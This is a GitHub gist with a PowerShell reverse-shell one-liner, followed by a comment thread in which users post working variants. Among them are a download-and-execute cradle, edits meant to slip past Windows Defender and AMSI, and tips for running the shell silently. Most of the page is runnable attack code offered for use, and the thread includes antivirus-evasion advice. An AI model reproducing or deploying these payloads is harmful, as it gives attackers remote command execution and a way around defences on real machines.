Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Jul 25, 2020

Thanks Mate!

@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Jul 25, 2020

And where i can scan for the results of .ps1 file? It doesnt works on anti scan.me and nodistribute also doesnt works

Copy link

ghost commented Jul 25, 2020

Copy link

ghost commented Jul 25, 2020

@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Jul 25, 2020

Also it ran first time but second time it was detected.

@egre55
Copy link
Author

egre55 commented Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80

Copy link

ghost commented Jul 25, 2020

@egre55
Copy link
Author

egre55 commented Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"

Copy link

ghost commented Jul 25, 2020

@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Jul 25, 2020

Yes! I am not using it for Non Ethical purposes bro! I am a Ethical Hacker and need this for pentensting purpose!

Copy link

ghost commented Jul 25, 2020

@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Jul 25, 2020

Script Is running now but it gives detection error
@egre55, What were you telling to replace? to evade defender? Can u do the changes in the code?

Capture

@epicn1337
Copy link

epicn1337 commented Aug 21, 2020

One way or the other this script can be a disaster this is the best way i run such script::::::::::::: make sure you add the powershell -nop -c followed:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Aug 21, 2020

Which listener can be used for this? NetCat?

@egre55
Copy link
Author

egre55 commented Aug 21, 2020

@Vedant-Bhalgama
Copy link

Vedant-Bhalgama commented Aug 22, 2020

It got detected as MaliciousContent, Anything else? Should I try Obfuscation?

@Yashraj-Garnayak
Copy link

Yashraj-Garnayak commented Nov 4, 2020

After executing it in PowerShell with IP and port changed but it is showing....... "new object exception calling ctor with 2 argument s connection attempt failed " what to do because I am not a PowerShell expert.
I run the netcat server in the Virtualbox

Copy link

ghost commented Nov 12, 2020

@munteanulc
Copy link

munteanulc commented Jan 11, 2021

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

@cnibbler
Copy link

cnibbler commented Feb 11, 2021

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

@pentestblogin
Copy link

pentestblogin commented Apr 16, 2021

[vry nice )

@pretech86
Copy link

pretech86 commented Apr 27, 2021

i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently

@CalfCrusher
Copy link

CalfCrusher commented Jul 29, 2021

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

@Developer-Mike
Copy link

Developer-Mike commented Sep 14, 2021

Hi, can someone explain how this exactly works? Why is (pwd).Path triggers the antivirus. And is this reverse shell only available until a restart of the victim's pc? I didn't found any explanation online. Thanks in advance.

@rikuru-to865
Copy link

rikuru-to865 commented Sep 25, 2021

good job!
It detected AMSI. but I used amsi bypass script before this script running.so this script runs successfully!

@mappl3
Copy link

mappl3 commented Feb 1, 2022

Looks like the shell did not return stderr, is it possible to return stderr as well?

@egre55
Copy link
Author

egre55 commented Feb 1, 2022

hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr

@Veids
Copy link

Veids commented Oct 4, 2022

Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

@egre55
Copy link
Author

egre55 commented Oct 4, 2022

that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!

@ChillVibesMushroom
Copy link

ChillVibesMushroom commented Oct 31, 2022

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

How would I run this from a bat file and what book do you recommend to learn powershell scripting on this level

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment